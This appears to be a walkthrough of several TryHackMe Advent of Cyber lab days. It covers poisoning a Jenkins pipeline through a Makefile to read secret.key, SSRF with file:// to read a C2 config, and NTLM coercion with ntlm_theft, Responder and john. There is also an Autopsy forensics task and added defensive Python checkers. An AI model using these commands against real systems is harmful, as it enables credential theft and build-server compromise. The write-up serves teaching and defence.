Get started with Cyber Security in 24 Days - Learn the basics by doing a new, beginner-friendly security challenge every day leading up to Christmas.
Cover Image by BiZkettE1 on Freepik
It is strongly recommended to go through the reading material that accompanies each task before going through this guide. This article will only include the content necessary to answer the questions.
- Understand how a larger CI/CD environment operates.
- Explore indirect poisoned pipeline execution (PPE) and how it can be used to exploit Git.
- Apply CI/CD exploitation knowledge to the larger CI/CD environment.
In this challenge, we are told that AntarctiCrafts uses Gitea as their version control system (VCS) and Jenkins as their build platform. We need to find a way to poison the pipeline.
In the Attack Box, navigate to http://10.10.95.76:3000. This will load the Gitea landing page. Use the login button to sign in.
We can see that there are 2 repositories in the VCS.
In a new tab, navigate to http://10.10.95.76:8080/. This should open the login page for Jenkins.
In Jenkins, there is a build pipeline configured for the
Back in Gitea, the gift-wrapper-pipeline repository contains the configuration for the Jenkins build pipelines.
We could modify this file to make the pipeline run malicious code. Let us clone this repo and modify the sh 'make || true' line to
git clone http://10.10.95.76:3000/McHoneyBell/gift-wrapper-pipeline.git
Once the changes have been made, save the file.
Now let us commit the changes back to the remote repository.
git add .
git commit -m "Updated Code"
git push
Enter Gitea credentials when prompted. We see that we are not able to push the changes, since the branch is write-protected.
If we try to make a new branch and push the changes we will get the same error. This means that we cannot poison the pipeline using the pipeline configuration.
Now we need to find a file in the gift-wrapper repository that can cause malicious code to be executed. The repository has a Makefile. This file can execute system commands, so let's see if we can modify it.
git clone http://10.10.95.76:3000/McHoneyBell/gift-wrapper.git
Make the changes as shown in the below image:
Now let us commit the changes to the repository.
git add .
git commit -m "Changed Makefile"
git push
Enter Gitea credentials when prompted. This time we can push the changes to the remote repository.
In the Jenkins portal click on gift-wrapper-build, then click on gift-wrapper-pipeline. This will bring you to the below page. Click on the green play button on the right side of the object named
There will be no change in the UI after clicking the button. Wait for a minute then click on the “Build History” button from the sidebar.
This will load the following page. Scroll to the bottom and click on the Console icon that is shown on the right-hand side for the task at the top (latest task).
Note: The task no. can be different in your case. Select the task that is on the top.
This will load a page where we can see the output of the pipeline. Scroll to the bottom and we should see the output of the commands we had added in the
1. What Linux kernel version is the Jenkins node?
2. What value is found from /var/lib/jenkins/secret.key?
To view the content of this file we need to use the cat command. We need to add a new command to the
Now we need to commit the changes and execute the pipeline once again (repeat the steps starting from the Pushing Changes section).
If we view the output of the latest pipeline run the content of the file should be displayed.
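The lesson of this day is that protecting the Jenkinsfile is not enough when that file hands execution to other repository files such as the Makefile. The following is an added example, not code from the challenge or from TryHackMe, that lists which files a Jenkins declarative pipeline executes through its sh steps but that are not covered by branch or path protection, and then intersects that set with the files touched by a push. The Jenkinsfile text, the protected-path set and the changed-file list are constructed for the example (the Jenkinsfile is modelled on the page's sh 'make || true' step); the command-to-file mapping is a heuristic that only understands make, sh/bash and ./script invocations.

```python
import re

# Constructed Jenkinsfile for this example; it is not the challenge's real
# pipeline file, but its first step mirrors the page's `sh 'make || true'`.
SAMPLE_JENKINSFILE = """
pipeline {
    agent any
    stages {
        stage('Build') {
            steps {
                sh 'make || true'
            }
        }
        stage('Package') {
            steps {
                sh './scripts/package.sh'
            }
        }
        stage('Test') {
            steps {
                sh 'echo tests skipped'
            }
        }
    }
}
"""

# Matches sh 'script', sh "script" and sh('script') in a declarative pipeline.
SH_STEP = re.compile(r"""\bsh\s*\(?\s*(['"])(.*?)\1""", re.S)


def commands_in_sh_steps(jenkinsfile):
    """Return each simple command run by sh steps, split on ||, &&, ; and |."""
    commands = []
    for _quote, script in SH_STEP.findall(jenkinsfile):
        for part in re.split(r"\|\||&&|;|\|", script):
            part = part.strip()
            if part:
                commands.append(part)
    return commands


def files_executed_by(command):
    """Map one shell command to the repo files it executes (heuristic)."""
    argv = command.split()
    tool = argv[0]
    if tool == "make":
        # `make -f other.mk` runs that file; plain `make` runs the Makefile.
        if "-f" in argv and argv.index("-f") + 1 < len(argv):
            return {argv[argv.index("-f") + 1]}
        return {"Makefile"}
    if tool in ("sh", "bash") and len(argv) > 1:
        return {argv[1]}
    if tool.startswith("./"):
        return {tool[2:]}
    return set()


def unprotected_executed_files(jenkinsfile, protected_paths):
    """Files the pipeline executes that are NOT under path/branch protection."""
    executed = set()
    for command in commands_in_sh_steps(jenkinsfile):
        executed |= files_executed_by(command)
    return sorted(executed - set(protected_paths))


def risky_changes(changed_files, jenkinsfile, protected_paths):
    """Changed files in a push that the pipeline will execute without protection.

    A non-empty result is the indirect PPE condition: the pipeline definition
    itself is protected, but a file it runs can be altered by the pusher.
    """
    risky = set(unprotected_executed_files(jenkinsfile, protected_paths))
    return sorted(risky & set(changed_files))


if __name__ == "__main__":
    # Constructed push: only the Jenkinsfile is protected, as in the challenge.
    print(risky_changes(["Makefile", "README.md"], SAMPLE_JENKINSFILE, {"Jenkinsfile"}))
```

Run against the constructed input, the check reports Makefile and scripts/package.sh as executed-but-unprotected, and flags the Makefile change in the push. Two practical notes follow from the page's own pipeline line: the Makefile needs the same review and protection rules as the Jenkinsfile, and the `|| true` suffix means a failing (or tampered) make will never turn the build red, so a failed build is not a signal you can rely on here.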
- Understanding server-side request forgery (SSRF)
- Which different types of SSRF are used to exploit the vulnerability
- Prerequisites for exploiting the vulnerability
- How the attack works
- How to exploit the vulnerability
- Mitigation measures for protection
On the Attack Box, in the /etc/hosts file, add the following:
Visit the following URL: http://mcgreedysecretc2.thm. We are presented with the login page for the C2 server. Click on the “Accessing through API” link.
On the documentation page look at points 1 and 4. Point 1 shows how to access files on a remote server using the API. Point 4 tells us that config.php contains the credentials for accessing the C2 server.
Since we want to access files on the C2 server itself, we need to modify the command that is provided so it reads local files instead of remote ones. Instead of passing a URL to the url parameter, we can pass the path to a local file using the file:// URI scheme.
This gives us the content of the
Using the same technique we can open the
Using the credentials from the config file we can log into the dashboard of the C2 server.
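The mitigation this day's material asks for is a check on the url parameter before the server fetches anything. The following Python validator is an added example, not the C2 application's code and not part of the original post: it allows only http and https (so the file:// trick above is refused), resolves the host, and rejects anything that lands on loopback, link-local, private or other non-public address space. The hostnames and the resolver mapping used in the test are constructed; validate_fetch_url, is_internal_address and the injectable resolver argument are names chosen for this example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Only remote web fetches are a legitimate use of the API; file://, gopher://,
# ftp:// and friends are never acceptable for a server-side fetch.
ALLOWED_SCHEMES = {"http", "https"}


def is_internal_address(ip_text):
    """True for loopback, link-local, private, reserved or otherwise non-global IPs."""
    return not ipaddress.ip_address(ip_text).is_global


def validate_fetch_url(url, resolver=socket.gethostbyname):
    """Decide whether a server-side fetch of `url` may proceed.

    Returns (True, resolved_ip) on success, otherwise (False, reason).
    `resolver` is injectable so the check can be tested without DNS; the
    default is the real socket.gethostbyname.
    """
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # This branch is what stops file:///.../config.php style reads.
        return False, f"scheme {scheme!r} is not allowed"
    host = parsed.hostname
    if not host:
        return False, "URL has no host"
    try:
        # Literal IPv4/IPv6 host (e.g. http://127.0.0.1/ or http://[::1]/).
        ip_text = str(ipaddress.ip_address(host))
    except ValueError:
        try:
            ip_text = resolver(host)
        except OSError as exc:
            return False, f"cannot resolve {host}: {exc}"
    if is_internal_address(ip_text):
        return False, f"{host} resolves to non-public address {ip_text}"
    return True, ip_text


if __name__ == "__main__":
    # Constructed resolver: no DNS is needed to run the demonstration.
    fake_dns = {"public.example": "8.8.8.8", "intranet.local": "10.0.0.5"}
    for candidate in ("file:///var/www/html/config.php",
                      "http://intranet.local/",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://public.example/report.pdf"):
        print(candidate, validate_fetch_url(candidate, fake_dns.__getitem__))
```

Two caveats a reviewer would raise on this check: the fetch that follows must connect to the IP the validator returned (not re-resolve the name), otherwise a DNS rebinding between check and use defeats it; and HTTP redirects must be re-validated with the same function, because a public host can redirect the fetcher to 127.0.0.1 or file://.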
1. Is SSRF the process in which the attacker tricks the server into loading only external resources (yea/nay)?
2. What is the C2 version?
The version is present on the footer of the dashboard.
3. What is the username for accessing the C2 panel?
4. What is the flag value after accessing the C2 panel?
Value is present on the top navigation bar
5. What is the flag value after stopping the data exfiltration from the McSkidy computer?
If we scroll down in the dashboard we see the PCs that have been infected. Click on Remove for
Click “Yes, remove it!”.
- The basics of network file shares
- Understanding NTLM authentication
- How NTLM authentication coercion attacks work
- How Responder works for authentication coercion attacks
- Forcing authentication coercion using
1. What is the name of the AD authentication protocol that makes use of tickets?
Based on the Day 11 task we know that Kerberos uses tickets
2. What is the name of the AD authentication protocol that makes use of the NTLM hash?
3. What is the name of the tool that can intercept these authentication challenges?
4. What is the password that McGreedy set for the Administrator account?
To retrieve the password we have to coerce McGreedy into authenticating with our device. When the authentication occurs we can capture the challenge-response, which is computed using McGreedy's NTLM hash. After extracting the hash from the captured exchange we can crack it offline using john.
We use ntlm_theft to create a honeyfile that will force authentication when opened.
python3 ntlm_theft -g lnk -s 10.10.245.151 -f stealthy
In the above command -g is the file type, -s is our IP address and -f is the directory to store the created file.
Copy the file over to the SMB share which McGreedy frequently accesses.
smbclient //10.10.109.57/ElfShare/ -U guest%
On listing the content of the share we find greedykeys.txt. Download the file, as it should contain all the passwords that are used by McGreedy.
In a new tab start Responder. After some time, when McGreedy opens our honeyfile, Responder will capture McGreedy's NTLM hash.
responder -I ens5
In a new tab, save the NTLM hash into a file called hash.txt. Use john along with the password list we got from the file share to crack the hash.
john --wordlist=greedykeys.txt hash.txt
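From the defender's side, the artefact this attack leaves on the share is the honeyfile itself: a shortcut or similar auto-parsed file whose icon or target points at a UNC host that is not one of the organisation's file servers. The scanner below is an added example, not one of the tools used above and not from the ntlm_theft project; it walks a share, looks inside file types Explorer parses on sight, and reports UNC or file:// references to hosts outside a trusted set. The sample share, its file contents and the trusted-host set are constructed in build_sample_share (the .lnk stand-in is a few header bytes plus a UTF-16LE UNC path, not a valid shortcut), and the scanner is a string-level heuristic rather than a full LNK parser.

```python
import re
import tempfile
from pathlib import Path

# File types Windows Explorer parses when a folder is merely listed; a UNC
# reference inside any of them can trigger an outbound SMB authentication.
AUTO_PARSED_SUFFIXES = {".lnk", ".url", ".scf", ".library-ms", ".theme", ".rtf"}

# Host part of \\host\share\... or file://host/...
UNC_REF = re.compile(r"(?:\\\\|file://)([A-Za-z0-9_.\-]+)[\\/]")


def unc_hosts_in(data: bytes):
    """Collect hosts named in UNC paths or file:// URLs, in ASCII and UTF-16LE."""
    texts = [data.decode("latin-1")]
    for offset in (0, 1):  # UTF-16LE strings may start at either byte alignment
        texts.append(data[offset:].decode("utf-16-le", errors="ignore"))
    hosts = set()
    for text in texts:
        hosts.update(UNC_REF.findall(text))
    return hosts


def scan_share(root, trusted_hosts):
    """Return (file name, host) pairs for references to untrusted hosts."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in AUTO_PARSED_SUFFIXES:
            continue
        for host in sorted(unc_hosts_in(path.read_bytes()) - set(trusted_hosts)):
            findings.append((path.name, host))
    return findings


def build_sample_share():
    """Constructed sample share: one benign text file plus a .lnk and a .url
    that reference an outside host (the attacker IP from the walkthrough)."""
    root = Path(tempfile.mkdtemp(prefix="elfshare_"))
    (root / "greedykeys.txt").write_text("password1\nwinter2023\n")
    # Minimal .lnk stand-in: header size field, padding, UTF-16LE icon path.
    icon_path = "\\\\10.10.245.151\\share\\icon.ico".encode("utf-16-le")
    (root / "stealthy.lnk").write_bytes(b"L\x00\x00\x00" + b"\x00" * 7 + icon_path)
    (root / "notes.url").write_text(
        "[InternetShortcut]\n"
        "URL=file://10.10.245.151/docs/readme\n"
        "IconFile=\\\\fileserver01\\icons\\doc.ico\n"
    )
    return root


if __name__ == "__main__":
    share = build_sample_share()
    for name, host in scan_share(share, trusted_hosts={"fileserver01"}):
        print(f"{name}: references untrusted host {host}")
```

On the constructed share the scanner flags stealthy.lnk and notes.url for 10.10.245.151 and ignores the IconFile entry that points at the trusted fileserver01. In a real deployment the trusted set should be the inventory of approved file servers, and any hit is worth pairing with the SMB server's own logs of who wrote the file and when.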
5. What is the value of the flag that is placed on the Administrator’s desktop?
We need to log in to the target using RDP. A popular RDP client on Linux is Remmina.
On the Attack Box, you might encounter this popup. Click on Cancel.
Once Remmina launches, click on the + icon in the top-left corner. This will open the new connection window. Enter the target system IP along with the username and password that were captured.
Click on Connect to start the RDP session.
Accept the fingerprint of the remote server.
From the File Explorer sidebar click on This PC -> Desktop. Open
- Procedures for collecting digital evidence
- The challenges with modern smartphones
- Using Autopsy Digital Forensics with an actual Android image
1. One of the photos contains a flag. What is it?
Launch Autopsy using the shortcut on Desktop. Select Open Recent Case.
Click on Open to launch the Case.
From the sidebar select
File Views -> File Types -> By Extension -> Images.
Change the view to Thumbnail view and select Large Thumbnails. Scroll through the images and you will find the blackboard.
The same image can also be found using the Table view.
2. What name does Tracy use to save Detective Frost-eau’s phone number?
From the sidebar select Data Artifacts -> Communication Accounts -> Contacts.
The only entry with a detective in it is the second contact
3. One SMS exchanged with Van Sprinkles contains a password. What is it?
From the sidebar select Data Artifacts -> Communication Accounts -> Messages.
We can see a conversation that took place with another contact.
When we look at the Text column we find the password in one of the messages.
If we look at the Contacts on the phone we see that McGreedy was speaking with Van Sprinkles.
Refer: Day 1 - Question 3
Refer: Day 23 - Question 4
Read: Day 5 premise on THM
Read: Day 10 premise on THM
Refer: Day 8 - Question 1
Refer: Day 9 - Questions 6 & 7
Refer: Day 19 - Question 5
Refer: Day 22 - Question 3
Refer: Day 24 - Question 3
1. What is the final flag?
1. What flag did you get after completing the survey?